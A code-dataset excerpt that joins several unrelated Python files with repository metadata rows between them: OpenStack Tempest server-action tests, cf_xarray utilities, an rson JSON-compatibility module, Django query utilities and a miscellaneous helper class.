self.assert_flavor_equal(self.flavor_ref, server['flavor'])
@decorators.idempotent_id('fbbf075f-a812-4022-bc5c-ccb8047eef12')
@decorators.related_bug('1737599')
@testtools.skipUnless(CONF.compute_feature_enabled.resize,
'Resize not available.')
@utils.services('volume')
def test_resize_server_revert_with_volume_attached(self):
"""Test resizing a volume attached server and then reverting
Tests attaching a volume to a server instance and then resizing
the instance. Once the instance is resized, revert the resize which
should move the instance and volume attachment back to the original
compute host.
"""
# Create a blank volume and attach it to the server created in setUp.
volume = self.create_volume()
server = self.client.show_server(self.server_id)['server']
self.attach_volume(server, volume)
# Now resize the server with the blank volume attached.
self.client.resize_server(self.server_id, self.flavor_ref_alt)
# Explicitly delete the server to get a new one for later
# tests. Avoids resize down race issues.
self.addCleanup(self.delete_server, self.server_id)
waiters.wait_for_server_status(
self.client, self.server_id, 'VERIFY_RESIZE')
# Now revert the resize which should move the instance and it's volume
# attachment back to the original source compute host.
self.client.revert_resize_server(self.server_id)
waiters.wait_for_server_status(self.client, self.server_id, 'ACTIVE')
# Make sure everything still looks OK.
server = self.client.show_server(self.server_id)['server']
self.assert_flavor_equal(self.flavor_ref, server['flavor'])
attached_volumes = server['os-extended-volumes:volumes_attached']
self.assertEqual(1, len(attached_volumes))
self.assertEqual(volume['id'], attached_volumes[0]['id'])
@decorators.idempotent_id('b963d4f1-94b3-4c40-9e97-7b583f46e470')
@testtools.skipUnless(CONF.compute_feature_enabled.snapshot,
'Snapshotting not available, backup not possible.')
@utils.services('image')
def test_create_backup(self):
"""Test creating server backup
1. create server backup1 with rotation=2, there are 1 backup.
2. create server backup2 with rotation=2, there are 2 backups.
3. create server backup3, due to the rotation is 2, the first one
(backup1) will be deleted, so now there are still 2 backups.
"""
# create the first and the second backup
# Check if glance v1 is available to determine which client to use. We
# prefer glance v1 for the compute API tests since the compute image
# API proxy was written for glance v1.
if CONF.image_feature_enabled.api_v1:
glance_client = self.os_primary.image_client
elif CONF.image_feature_enabled.api_v2:
glance_client = self.os_primary.image_client_v2
else:
raise lib_exc.InvalidConfiguration(
'Either api_v1 or api_v2 must be True in '
'[image-feature-enabled].')
backup1 = data_utils.rand_name('backup-1')
resp = self.client.create_backup(self.server_id,
backup_type='daily',
rotation=2,
name=backup1)
oldest_backup_exist = True
# the oldest one should be deleted automatically in this test
def _clean_oldest_backup(oldest_backup):
if oldest_backup_exist:
try:
glance_client.delete_image(oldest_backup)
except lib_exc.NotFound:
pass
else:
LOG.warning("Deletion of oldest backup %s should not have "
"been successful as it should have been "
"deleted during rotation.", oldest_backup)
if api_version_utils.compare_version_header_to_response(
"OpenStack-API-Version", "compute 2.45", resp.response, "lt"):
image1_id = resp['image_id']
else:
image1_id = data_utils.parse_image_id(resp.response['location'])
self.addCleanup(_clean_oldest_backup, image1_id)
waiters.wait_for_image_status(glance_client,
image1_id, 'active')
backup2 = data_utils.rand_name('backup-2')
waiters.wait_for_server_status(self.client, self.server_id, 'ACTIVE')
resp = self.client.create_backup(self.server_id,
backup_type='daily',
rotation=2,
name=backup2)
if api_version_utils.compare_version_header_to_response(
"OpenStack-API-Version", "compute 2.45", resp.response, "lt"):
image2_id = resp['image_id']
else:
image2_id = data_utils.parse_image_id(resp.response['location'])
self.addCleanup(glance_client.delete_image, image2_id)
waiters.wait_for_image_status(glance_client,
image2_id, 'active')
# verify they have been created
properties = {
'image_type': 'backup',
'backup_type': "daily",
'instance_uuid': self.server_id,
}
params = {
'status': 'active',
'sort_key': 'created_at',
'sort_dir': 'asc'
}
if CONF.image_feature_enabled.api_v1:
for key, value in properties.items():
params['property-%s' % key] = value
image_list = glance_client.list_images(
detail=True,
**params)['images']
else:
# Additional properties are flattened in glance v2.
params.update(properties)
image_list = glance_client.list_images(params)['images']
self.assertEqual(2, len(image_list))
self.assertEqual((backup1, backup2),
(image_list[0]['name'], image_list[1]['name']))
# create the third one, due to the rotation is 2,
# the first one will be deleted
backup3 = data_utils.rand_name('backup-3')
waiters.wait_for_server_status(self.client, self.server_id, 'ACTIVE')
resp = self.client.create_backup(self.server_id,
backup_type='daily',
rotation=2,
name=backup3)
if api_version_utils.compare_version_header_to_response(
"OpenStack-API-Version", "compute 2.45", resp.response, "lt"):
image3_id = resp['image_id']
else:
image3_id = data_utils.parse_image_id(resp.response['location'])
self.addCleanup(glance_client.delete_image, image3_id)
# the first back up should be deleted
waiters.wait_for_server_status(self.client, self.server_id, 'ACTIVE')
glance_client.wait_for_resource_deletion(image1_id)
oldest_backup_exist = False
if CONF.image_feature_enabled.api_v1:
image_list = glance_client.list_images(
detail=True, **params)['images']
else:
image_list = glance_client.list_images(params)['images']
self.assertEqual(2, len(image_list),
'Unexpected number of images for '
'v2:test_create_backup; was the oldest backup not '
'yet deleted? Image list: %s' %
[image['name'] for image in image_list])
self.assertEqual((backup2, backup3),
(image_list[0]['name'], image_list[1]['name']))
def _get_output(self):
output = self.client.get_console_output(
self.server_id, length=3)['output']
self.assertTrue(output, "Console output was empty.")
lines = len(output.split('\n'))
self.assertEqual(lines, 3)
@decorators.idempotent_id('4b8867e6-fffa-4d54-b1d1-6fdda57be2f3')
@testtools.skipUnless(CONF.compute_feature_enabled.console_output,
'Console output not supported.')
def test_get_console_output(self):
"""Test getting console output for a server
Should be able to GET the console output for a given server_id and
number of lines.
"""
# This reboot is necessary for outputting some console log after
# creating an instance backup. If an instance backup, the console
# log file is truncated and we cannot get any console log through
# "console-log" API.
# The detail is https://bugs.launchpad.net/nova/+bug/1251920
self.client.reboot_server(self.server_id, type='HARD')
waiters.wait_for_server_status(self.client, self.server_id, 'ACTIVE')
self.wait_for(self._get_output)
@decorators.idempotent_id('89104062-69d8-4b19-a71b-f47b7af093d7')
@testtools.skipUnless(CONF.compute_feature_enabled.console_output,
'Console output not supported.')
def test_get_console_output_with_unlimited_size(self):
"""Test getting server's console output with unlimited size
The console output lines length should be bigger than the one
of test_get_console_output.
"""
server = self.create_test_server(wait_until='ACTIVE')
def _check_full_length_console_log():
output = self.client.get_console_output(server['id'])['output']
self.assertTrue(output, "Console output was empty.")
lines = len(output.split('\n'))
# NOTE: This test tries to get full length console log, and the
# length should be bigger than the one of test_get_console_output.
self.assertGreater(lines, 3, "Cannot get enough console log "
"length. (lines: %s)" % lines)
self.wait_for(_check_full_length_console_log)
@decorators.idempotent_id('5b65d4e7-4ecd-437c-83c0-d6b79d927568')
@testtools.skipUnless(CONF.compute_feature_enabled.console_output,
'Console output not supported.')
def test_get_console_output_server_id_in_shutoff_status(self):
"""Test getting console output for a server in SHUTOFF status
Should be able to GET the console output for a given server_id
in SHUTOFF status.
"""
# NOTE: SHUTOFF is irregular status. To avoid test instability,
# one server is created only for this test without using
# the server that was created in setUpClass.
server = self.create_test_server(wait_until='ACTIVE')
temp_server_id = server['id']
self.client.stop_server(temp_server_id)
waiters.wait_for_server_status(self.client, temp_server_id, 'SHUTOFF')
self.wait_for(self._get_output)
@decorators.idempotent_id('bd61a9fd-062f-4670-972b-2d6c3e3b9e73')
@testtools.skipUnless(CONF.compute_feature_enabled.pause,
'Pause is not available.')
def test_pause_unpause_server(self):
"""Test pausing and unpausing server"""
self.client.pause_server(self.server_id)
waiters.wait_for_server_status(self.client, self.server_id, 'PAUSED')
self.client.unpause_server(self.server_id)
waiters.wait_for_server_status(self.client, self.server_id, 'ACTIVE')
@decorators.idempotent_id('0d8ee21e-b749-462d-83da-b85b41c86c7f')
@testtools.skipUnless(CONF.compute_feature_enabled.suspend,
'Suspend is not available.')
def test_suspend_resume_server(self):
"""Test suspending and resuming server"""
self.client.suspend_server(self.server_id)
waiters.wait_for_server_status(self.client, self.server_id,
'SUSPENDED')
self.client.resume_server(self.server_id)
waiters.wait_for_server_status(self.client, self.server_id, 'ACTIVE')
@decorators.idempotent_id('77eba8e0-036e-4635-944b-f7a8f3b78dc9')
@testtools.skipUnless(CONF.compute_feature_enabled.shelve,
'Shelve is not available.')
@utils.services('image')
def test_shelve_unshelve_server(self):
"""Test shelving and unshelving server"""
if CONF.image_feature_enabled.api_v2:
glance_client = self.os_primary.image_client_v2
elif CONF.image_feature_enabled.api_v1:
glance_client = self.os_primary.image_client
else:
raise lib_exc.InvalidConfiguration(
'Either api_v1 or api_v2 must be True in '
'[image-feature-enabled].')
compute.shelve_server(self.client, self.server_id,
force_shelve_offload=True)
def _unshelve_server():
server_info = self.client.show_server(self.server_id)['server']
if 'SHELVED' in server_info['status']:
self.client.unshelve_server(self.server_id)
self.addCleanup(_unshelve_server)
server = self.client.show_server(self.server_id)['server']
image_name = server['name'] + '-shelved'
params = {'name': image_name}
if CONF.image_feature_enabled.api_v2:
images = glance_client.list_images(params)['images']
elif CONF.image_feature_enabled.api_v1:
images = glance_client.list_images(
detail=True, **params)['images']
self.assertEqual(1, len(images))
self.assertEqual(image_name, images[0]['name'])
self.client.unshelve_server(self.server_id)
waiters.wait_for_server_status(self.client, self.server_id, 'ACTIVE')
glance_client.wait_for_resource_deletion(images[0]['id'])
@decorators.idempotent_id('8cf9f450-a871-42cf-9bef-77eba189c0b0')
@decorators.related_bug('1745529')
@testtools.skipUnless(CONF.compute_feature_enabled.shelve,
'Shelve is not available.')
@testtools.skipUnless(CONF.compute_feature_enabled.pause,
'Pause is not available.')
def test_shelve_paused_server(self):
"""Test shelving a paused server"""
server = self.create_test_server(wait_until='ACTIVE')
self.client.pause_server(server['id'])
waiters.wait_for_server_status(self.client, server['id'], 'PAUSED')
# Check if Shelve operation is successful on paused server.
compute.shelve_server(self.client, server['id'],
force_shelve_offload=True)
@decorators.idempotent_id('af8eafd4-38a7-4a4b-bdbc-75145a580560')
def test_stop_start_server(self):
"""Test stopping and starting server"""
self.client.stop_server(self.server_id)
waiters.wait_for_server_status(self.client, self.server_id, 'SHUTOFF')
self.client.start_server(self.server_id)
waiters.wait_for_server_status(self.client, self.server_id, 'ACTIVE')
@decorators.idempotent_id('80a8094c-211e-440a-ab88-9e59d556c7ee')
def test_lock_unlock_server(self):
"""Test locking and unlocking server
Lock the server, and trying to stop it will fail because locked
server is not allowed to be stopped by non-admin user.
Then unlock the server, now the server can be stopped and started.
"""
# Lock the server,try server stop(exceptions throw),unlock it and retry
self.client.lock_server(self.server_id)
self.addCleanup(self.client.unlock_server, self.server_id)
server = self.client.show_server(self.server_id)['server']
self.assertEqual(server['status'], 'ACTIVE')
# Locked server is not allowed to be stopped by non-admin user
self.assertRaises(lib_exc.Conflict,
self.client.stop_server, self.server_id)
self.client.unlock_server(self.server_id)
self.client.stop_server(self.server_id)
waiters.wait_for_server_status(self.client, self.server_id, 'SHUTOFF')
self.client.start_server(self.server_id)
waiters.wait_for_server_status(self.client, self.server_id, 'ACTIVE')
def _validate_url(self, url):
valid_scheme = ['http', 'https']
parsed_url = urlparse.urlparse(url)
self.assertNotEqual('None', parsed_url.port)
self.assertNotEqual('None', parsed_url.hostname)
self.assertIn(parsed_url.scheme, valid_scheme)
@decorators.idempotent_id('c6bc11bf-592e-4015-9319-1c98dc64daf5')
@testtools.skipUnless(CONF.compute_feature_enabled.vnc_console,
                      'VNC Console feature is disabled.')
def test_get_vnc_console(self):
    """Test getting vnc console from a server

    The returned vnc console url should be in valid format.
    """
    # For microversion <= 2.5 the legacy get_vnc_console API is used;
    # newer microversions use the unified get_remote_console API, which
    # wraps the result in a different response key.
    if self.is_requested_microversion_compatible('2.5'):
        body = self.client.get_vnc_console(
            self.server_id, type='novnc')['console']
    else:
        body = self.client.get_remote_console(
            self.server_id, console_type='novnc',
            protocol='vnc')['remote_console']
    self.assertEqual('novnc', body['type'])
    self.assertNotEqual('', body['url'])
    self._validate_url(body['url'])
| 46.55598 | 79 | 0.645096 |
e222133f97f82175476b81cea67a73fa5c226257 | 1,973 | py | Python | cf_xarray/utils.py | kmpaul/cf-xarray | 5133a4dada23b18221f2136e1f763cda8e65f249 | [
"Apache-2.0"
] | null | null | null | cf_xarray/utils.py | kmpaul/cf-xarray | 5133a4dada23b18221f2136e1f763cda8e65f249 | [
"Apache-2.0"
] | 5 | 2020-09-11T20:54:31.000Z | 2020-10-18T18:12:58.000Z | cf_xarray/utils.py | kmpaul/cf-xarray | 5133a4dada23b18221f2136e1f763cda8e65f249 | [
"Apache-2.0"
] | null | null | null | from typing import Any, Dict, Hashable, Mapping, Optional, TypeVar, cast
K = TypeVar("K")
V = TypeVar("V")
T = TypeVar("T")
def either_dict_or_kwargs(
    pos_kwargs: Optional[Mapping[Hashable, T]],
    kw_kwargs: Mapping[str, T],
    func_name: str,
) -> Mapping[Hashable, T]:
    """Return the mapping supplied either positionally or as keyword args.

    Exactly one of *pos_kwargs* / *kw_kwargs* may carry values; a
    ``ValueError`` (mentioning *func_name*) is raised when the positional
    argument is not dict-like or when both forms are given at once.
    """
    if pos_kwargs is None:
        # Need an explicit cast to appease mypy due to invariance; see
        # https://github.com/python/mypy/issues/6228
        return cast(Mapping[Hashable, T], kw_kwargs)

    if not is_dict_like(pos_kwargs):
        raise ValueError(
            "the first argument to .%s must be a dictionary" % func_name
        )
    if kw_kwargs:
        raise ValueError(
            "cannot specify both keyword and positional "
            "arguments to .%s" % func_name
        )
    return pos_kwargs
def is_dict_like(value: Any) -> bool:
    """Return True when *value* quacks like a mapping.

    Duck-typed check: the object must expose both ``keys`` and
    ``__getitem__``.
    """
    required = ("keys", "__getitem__")
    return all(hasattr(value, attr) for attr in required)
# copied from xarray
class UncachedAccessor:
    """Acts like a property, but on both classes and class instances.

    Unlike ``functools.cached_property``, no value is memoized: every
    instance access builds a fresh accessor object. Accessing the
    attribute on the class itself yields the accessor type, which keeps
    introspection tools (pydoc, sphinx) working.
    """

    def __init__(self, accessor):
        self._accessor = accessor

    def __get__(self, obj, cls):
        # Class-level access -> the accessor type; instance access ->
        # a brand-new accessor wrapping the instance.
        return self._accessor if obj is None else self._accessor(obj)
def parse_cell_methods_attr(attr: str) -> Dict[str, str]:
    """
    Parse cell_methods attributes (format is 'measure: name').

    Parameters
    ----------
    attr: str
        String to parse

    Returns
    -------
    Dictionary mapping measure to name
    """
    # Split on colons first, then on whitespace, yielding an alternating
    # sequence of measure / name tokens.
    tokens = []
    for chunk in attr.split(":"):
        tokens.extend(chunk.split())
    # A well-formed attribute produces measure/name pairs, so the token
    # count must be even.
    if len(tokens) % 2 != 0:
        raise ValueError(f"attrs['cell_measures'] = {attr!r} is malformed.")
    return dict(zip(tokens[::2], tokens[1::2]))
| 28.185714 | 76 | 0.621389 |
f655851d18c746da26ebbd0599f194d4730bdbaa | 2,915 | py | Python | rson/pyjson.py | tundish/rson | dd37de14c02c048720e3dd159464aa7b8c4709a6 | [
"MIT"
] | 1 | 2016-07-22T19:40:58.000Z | 2016-07-22T19:40:58.000Z | rson/pyjson.py | pombreda/rson | dd37de14c02c048720e3dd159464aa7b8c4709a6 | [
"MIT"
] | null | null | null | rson/pyjson.py | pombreda/rson | dd37de14c02c048720e3dd159464aa7b8c4709a6 | [
"MIT"
] | null | null | null | '''
This module provides enough compatibility with simplejson to run
the testsuite, if desired.
Copyright (c) 2010, Patrick Maupin. All rights reserved.
See http://code.google.com/p/rson/source/browse/trunk/license.txt
'''
import re
import rson
class PyJsonTokenizer(rson.base.Tokenizer):
    ''' Fudges location information to make it more like simplejson
    '''

    @staticmethod
    def sourceloc(token, oldloc=rson.base.Tokenizer.sourceloc):
        # The base-class method is captured as a default argument so it
        # can be invoked without a class/super() lookup at call time.
        offset, lineno, colno = oldloc(token)
        # Shift to simplejson's conventions: offset and column become
        # 0-based, with the column clamped to a minimum of 1.
        return offset-1, lineno, max(colno-1, 1)
class PyJsonSystem(rson.base.RsonSystem):
    ''' Compatible JSON-only token syntax, tries to work same as simplejson
    '''
    # Use the tokenizer above so source locations match simplejson's.
    Tokenizer = PyJsonTokenizer

    # These are simple things that simplejson does
    cachestrings = True
    parse_int = int
    disallow_multiple_object_keys = True

    # simplejson sets these, but doesn't test for them, and I
    # haven't bothered to implement them, or even figure out what they do.
    allowed_extra_attributes = set('encoding parse_constant cls'.split())

    # simplejson requires an unquoted literal to be
    # a number or one of the special values like true
    # or false, so report an error instead of wrapping
    # something not in those categories into a string.
    @staticmethod
    def parse_unquoted_str(token):
        token[-1].error('Invalid literal', token)

    # Follow the JSON syntax for unquoted literals,
    # plus add the simplejson Infinity and NaN.
    # (Stock RSON does not use Infinity or NaN, and
    # allows relaxed numeric patterns, including:
    #   - extra leading zeros on numbers
    #   - Missing 0 in front decimal point for floats
    #   - hex, binary, octal ints
    #   - embedded underscores in ints.)
    # These features do not work with simplejson.
    unquoted_pattern = r'''
    (?:
        true | false | null |       # Special JSON names
        Infinity | NaN |
        (?P<num>
            -?                      # Optional minus sign
            (?:0|[1-9]\d*) |        # Zero or digits with non-zero lead
          (?P<float>
             -?                     # Optional minus sign
            (?:0|[1-9]\d*)
            (?:\.\d+)?              # Optional frac part
            (?:[eE][-+]?\d+)?       # Optional exponent
            )
        )
    ) \Z                            # Match end of string
    '''

    # The special_strings dict has Infinity and Nan added to it.
    special_strings = dict(true = True, false = False, null = None,
                           Infinity = float('inf'), NaN = float('NaN'))

    # RSON does not care about weird control characters embedded in strings,
    # but JSON does.  To pass the simplejson test suite, make it care about these.
    quoted_splitter = re.compile(r'(\\u[0-9a-fA-F]{4}|\\.|"|[\x00-\x1f])').split
loads = PyJsonSystem.dispatcher_factory()
| 33.895349 | 82 | 0.610635 |
c1a690a524e5f4492ef10dd5d8a2840fa2e0bc0a | 7,039 | py | Python | django/db/models/query_utils.py | kix/django | 5262a288df07daa050a0e17669c3f103f47a8640 | [
"BSD-3-Clause"
] | 790 | 2015-01-03T02:13:39.000Z | 2020-05-10T19:53:57.000Z | AppServer/lib/django-1.5/django/db/models/query_utils.py | nlake44/appscale | 6944af660ca4cb772c9b6c2332ab28e5ef4d849f | [
"Apache-2.0"
] | 1,361 | 2015-01-08T23:09:40.000Z | 2020-04-14T00:03:04.000Z | AppServer/lib/django-1.5/django/db/models/query_utils.py | nlake44/appscale | 6944af660ca4cb772c9b6c2332ab28e5ef4d849f | [
"Apache-2.0"
] | 155 | 2015-01-08T22:59:31.000Z | 2020-04-08T08:01:53.000Z | """
Various data structures used in query construction.
Factored out from django.db.models.query to avoid making the main module very
large and/or so that they can be used by other modules without getting into
circular import difficulties.
"""
from __future__ import unicode_literals
from django.db.backends import util
from django.utils import six
from django.utils import tree
class InvalidQuery(Exception):
    """
    The query passed to raw isn't a safe query to use with raw.
    """
class QueryWrapper(object):
    """
    A type that indicates the contents are an SQL fragment and the associate
    parameters. Can be used to pass opaque data to a where-clause, for example.
    """

    def __init__(self, sql, params):
        # Stored as an (sql, params) pair, exactly what as_sql() returns.
        self.data = (sql, params)

    def as_sql(self, qn=None, connection=None):
        # qn/connection are accepted for API compatibility but ignored;
        # the fragment is returned verbatim.
        return self.data
class Q(tree.Node):
    """
    Encapsulates filters as objects that can then be combined logically (using
    & and |).
    """
    # Connection types
    AND = 'AND'
    OR = 'OR'
    default = AND

    def __init__(self, *args, **kwargs):
        # Positional args are child nodes (other Q objects); keyword args
        # are field lookups, stored as (key, value) tuples on the node.
        super(Q, self).__init__(children=list(args) + list(six.iteritems(kwargs)))

    def _combine(self, other, conn):
        # Build a fresh node holding both operands under the given
        # connector ('AND' / 'OR'); neither operand is mutated.
        if not isinstance(other, Q):
            raise TypeError(other)
        obj = type(self)()
        obj.add(self, conn)
        obj.add(other, conn)
        return obj

    def __or__(self, other):
        # q1 | q2  ->  OR-combined filter
        return self._combine(other, self.OR)

    def __and__(self, other):
        # q1 & q2  ->  AND-combined filter
        return self._combine(other, self.AND)

    def __invert__(self):
        # ~q  ->  negated copy of this filter, wrapped in a new node
        obj = type(self)()
        obj.add(self, self.AND)
        obj.negate()
        return obj
class DeferredAttribute(object):
    """
    A wrapper for a deferred-loading field. When the value is read from this
    object the first time, the query is executed.
    """
    def __init__(self, field_name, model):
        # NOTE(review): the `model` argument is unused here; presumably
        # kept for signature compatibility with callers — confirm.
        self.field_name = field_name

    def __get__(self, instance, owner):
        """
        Retrieves and caches the value from the datastore on the first lookup.
        Returns the cached value.
        """
        # Imported lazily to avoid an import cycle with the fields module.
        from django.db.models.fields import FieldDoesNotExist
        non_deferred_model = instance._meta.proxy_for_model
        opts = non_deferred_model._meta

        assert instance is not None
        data = instance.__dict__
        # `self` doubles as the sentinel: if the attribute is not yet in
        # the instance dict, the descriptor itself is returned by .get().
        if data.get(self.field_name, self) is self:
            # self.field_name is the attname of the field, but only() takes the
            # actual name, so we need to translate it here.
            try:
                f = opts.get_field_by_name(self.field_name)[0]
            except FieldDoesNotExist:
                f = [f for f in opts.fields
                     if f.attname == self.field_name][0]
            name = f.name
            # Lets see if the field is part of the parent chain. If so we
            # might be able to reuse the already loaded value. Refs #18343.
            val = self._check_parent_chain(instance, name)
            if val is None:
                # We use only() instead of values() here because we want the
                # various data coersion methods (to_python(), etc.) to be
                # called here.
                val = getattr(
                    non_deferred_model._base_manager.only(name).using(
                        instance._state.db).get(pk=instance.pk),
                    self.field_name
                )
            data[self.field_name] = val
        return data[self.field_name]

    def __set__(self, instance, value):
        """
        Deferred loading attributes can be set normally (which means there will
        never be a database lookup involved.
        """
        # Writing into the instance dict shadows the descriptor, so the
        # deferred fetch in __get__ is skipped from then on.
        instance.__dict__[self.field_name] = value

    def _check_parent_chain(self, instance, name):
        """
        Check if the field value can be fetched from a parent field already
        loaded in the instance. This can be done if the to-be fetched
        field is a primary key field.
        """
        opts = instance._meta
        f = opts.get_field_by_name(name)[0]
        link_field = opts.get_ancestor_link(f.model)
        # Only primary keys are shared with the parent link, and the link
        # field itself must not be the field we are fetching.
        if f.primary_key and f != link_field:
            return getattr(instance, link_field.attname)
        return None
def select_related_descend(field, restricted, requested, load_fields, reverse=False):
    """
    Returns True if this field should be used to descend deeper for
    select_related() purposes. Used by both the query construction code
    (sql.query.fill_related_selections()) and the model instance creation code
    (query.get_klass_info()).

    Arguments:
     * field - the field to be checked
     * restricted - a boolean field, indicating if the field list has been
       manually restricted using a requested clause)
     * requested - The select_related() dictionary.
     * load_fields - the set of fields to be loaded on this model
     * reverse - boolean, True if we are checking a reverse select related
    """
    # Only relational fields can be descended into at all.
    if not field.rel:
        return False
    # Parent links are followed implicitly in the forward direction, so
    # never descend through them again here.
    if field.rel.parent_link and not reverse:
        return False
    if restricted:
        # With an explicit select_related(...) spec, only follow relations
        # that were requested (keyed by related_query_name for reverse
        # relations, by field name otherwise).
        if reverse and field.related_query_name() not in requested:
            return False
        if not reverse and field.name not in requested:
            return False
    # Unrestricted select_related() never follows nullable relations.
    if not restricted and field.null:
        return False
    if load_fields:
        if field.name not in load_fields:
            # A field cannot be deferred and traversed at the same time.
            if restricted and field.name in requested:
                raise InvalidQuery("Field %s.%s cannot be both deferred"
                                   " and traversed using select_related"
                                   " at the same time." %
                                   (field.model._meta.object_name, field.name))
            return False
    return True
# This function is needed because data descriptors must be defined on a class
# object, not an instance, to have any effect.

def deferred_class_factory(model, attrs):
    """
    Returns a class object that is a copy of "model" with the specified "attrs"
    being replaced with DeferredAttribute objects. The "pk_value" ties the
    deferred attributes to a particular instance of the model.
    """
    class Meta:
        # The generated class is a proxy, so it shares the model's table.
        proxy = True
        app_label = model._meta.app_label

    # The app_cache wants a unique name for each model, otherwise the new class
    # won't be created (we get an old one back). Therefore, we generate the
    # name using the passed in attrs. It's OK to reuse an existing class
    # object if the attrs are identical.
    name = "%s_Deferred_%s" % (model.__name__, '_'.join(sorted(list(attrs))))
    # Keep the generated name inside database identifier length limits.
    name = util.truncate_name(name, 80, 32)

    # Each deferred attribute becomes a lazy-loading descriptor on the
    # generated subclass.
    overrides = dict([(attr, DeferredAttribute(attr, model))
                      for attr in attrs])
    overrides["Meta"] = Meta
    overrides["__module__"] = model.__module__
    overrides["_deferred"] = True
    return type(str(name), (model,), overrides)

# The above function is also used to unpickle model instances with deferred
# fields.
deferred_class_factory.__safe_for_unpickling__ = True
| 35.913265 | 85 | 0.636312 |
aae5911023caf8c6853b337ffea6634855cbfb95 | 4,709 | py | Python | pbx_gs_python_utils/utils/Misc.py | owasp-sbot/pbx-gs-python-utils | f448aa36c4448fc04d30c3a5b25640ea4d44a267 | [
"Apache-2.0"
] | 3 | 2018-12-14T15:43:46.000Z | 2019-04-25T07:44:58.000Z | pbx_gs_python_utils/utils/Misc.py | owasp-sbot/pbx-gs-python-utils | f448aa36c4448fc04d30c3a5b25640ea4d44a267 | [
"Apache-2.0"
] | 1 | 2019-05-11T14:19:37.000Z | 2019-05-11T14:51:04.000Z | pbx_gs_python_utils/utils/Misc.py | owasp-sbot/pbx-gs-python-utils | f448aa36c4448fc04d30c3a5b25640ea4d44a267 | [
"Apache-2.0"
] | 4 | 2018-12-27T04:54:14.000Z | 2019-05-11T14:07:47.000Z | import hashlib
import json
import pprint
import random
import string
import textwrap
import re
from time import sleep
class Misc:
    """Grab-bag of small static helpers (arrays, JSON, strings, randomness)."""

    @staticmethod
    def array_add(array, value):
        """Append value to array and return the value (not the array)."""
        array.append(value)
        return value

    @staticmethod
    def array_find(array, item):
        """Return the index of item in array, or None when absent/invalid."""
        try:
            return array.index(item)
        except (ValueError, AttributeError):  # missing item / not a list
            return None

    @staticmethod
    def array_get(array, position=None):
        """Return array[position] when the index is in range, else None.

        NOTE: a position is required; with position=None this always
        returns None (quirk kept for backwards compatibility).
        """
        if array and len(array) > 0:
            if (position is not None) and len(array) > position:
                return array[position]

    @staticmethod
    def array_pop(array, position=None):
        """Pop array[position] when valid, else the last element; None if empty."""
        if array and len(array) > 0:
            if (position is not None) and len(array) > position:
                return array.pop(position)
            return array.pop()

    @staticmethod
    def array_pop_and_trim(array, position=None):
        """Pop an element and strip surrounding whitespace (None-safe)."""
        value = Misc.array_pop(array, position)
        return Misc.trim(value)

    @staticmethod
    def chunks(items, split):
        """Yield consecutive slices of items, each at most `split` long."""
        for i in range(0, len(items), split):
            yield items[i:i + split]

    @staticmethod
    def class_name(target):
        """Name of target's type; None when target is falsy."""
        if target:
            return type(target).__name__
        return None

    @staticmethod
    def get_value(target, key, default=None):
        """Safe lookup: target.get(key), falling back to default on miss/error."""
        if target is not None:
            try:
                value = target.get(key)
                if value is not None:
                    return value
            except Exception:  # target may not support .get()
                pass
        return default

    @staticmethod
    def get_random_color(max=5):
        """Return one of up to five preset colour names, chosen at random."""
        if max > 5:
            max = 5  # only 5 colours are defined
        colors = ['skyblue', 'darkseagreen', 'palevioletred', 'coral', 'darkgray']
        return colors[Misc.random_number(0, max - 1)]

    @staticmethod
    def is_number(value):
        """True when value converts cleanly with int()."""
        try:
            int(value)
            return True
        except (TypeError, ValueError):
            return False

    @staticmethod
    def json_dumps(target, message=None):
        """Pretty-print target as JSON; return message when target is falsy."""
        if target:
            return json.dumps(target, indent=4)
        return message

    @staticmethod
    def json_format(target, message=None):
        """Alias of json_dumps (the two were duplicate implementations)."""
        return Misc.json_dumps(target, message)

    @staticmethod
    def json_load(target):
        """Parse a JSON string, returning None on any parse error."""
        if target:
            try:
                return json.loads(target)
            except (TypeError, ValueError):
                pass
        return None

    @staticmethod
    def none_or_empty(target, field):
        """True when target is falsy, or target[field] is missing or ''."""
        if target:
            value = target.get(field)
            return (value is None) or value == ''
        return True

    @staticmethod
    def object_data(target):
        """Return the instance attribute dict of target."""
        return target.__dict__

    @staticmethod
    def random_filename(extension='.tmp', length=10):
        """Random lowercase-alphanumeric file name with the given extension."""
        if len(extension) > 0 and extension[0] != '.':
            extension = '.' + extension
        stem = ''.join(random.choices(string.ascii_lowercase + string.digits, k=length))
        return '{0}{1}'.format(stem, extension)

    @staticmethod
    def random_number(min=1, max=65000):
        """Random integer in the inclusive range [min, max]."""
        return random.randint(min, max)

    @staticmethod
    def random_string_and_numbers(length=6, prefix=''):
        """prefix followed by `length` random uppercase letters/digits."""
        return prefix + ''.join(random.choices(string.ascii_uppercase + string.digits, k=length))

    @staticmethod
    def md5(target):
        """Hex MD5 digest of str(target); None for falsy input."""
        if target:
            return hashlib.md5('{0}'.format(target).encode()).hexdigest()
        return None

    @staticmethod
    def trim(target):
        """Strip surrounding whitespace; falsy values pass through unchanged."""
        if target:
            return target.strip()
        return target

    @staticmethod
    def to_int(value):
        """int(value), or None when conversion fails."""
        try:
            return int(value)
        except (TypeError, ValueError):
            return None

    @staticmethod
    def wait(seconds):
        """Block for the given number of seconds."""
        sleep(seconds)

    @staticmethod
    def word_wrap(text, length=40):
        """Hard-wrap text at `length` columns using real newlines."""
        return '\n'.join(textwrap.wrap(text, length))

    @staticmethod
    def word_wrap_escaped(text, length=40):
        """Hard-wrap using literal '\\n' sequences; None for falsy input."""
        if text:
            return '\\n'.join(textwrap.wrap(text, length))

    @staticmethod
    def convert_to_number(value):
        """Parse a float, stripping a leading '£' and separators; 0 on failure."""
        if value != '':
            try:
                if value[0] == '£':
                    return float(re.sub(r'[^\d.]', '', value))
                return float(value)
            except (TypeError, ValueError, IndexError):
                return 0
        return 0

    @staticmethod
    def remove_html_tags(html):
        """Strip HTML tags and normalise non-breaking spaces; None-safe."""
        if html:
            TAG_RE = re.compile(r'<[^>]+>')
            # '\xa0' written explicitly (the original used a literal
            # non-breaking-space character, invisible in source).
            return TAG_RE.sub('', html).replace('\xa0', ' ')
| 26.60452 | 124 | 0.55808 |
e7f1431813e1c7008a5fce26daf88ca9458f8e11 | 1,109 | py | Python | catboost/python-package/ut/medium/test_whl.py | PallHaraldsson/catboost | f4b86aae0acb853f0216081518d490e52722ad88 | [
"Apache-2.0"
] | null | null | null | catboost/python-package/ut/medium/test_whl.py | PallHaraldsson/catboost | f4b86aae0acb853f0216081518d490e52722ad88 | [
"Apache-2.0"
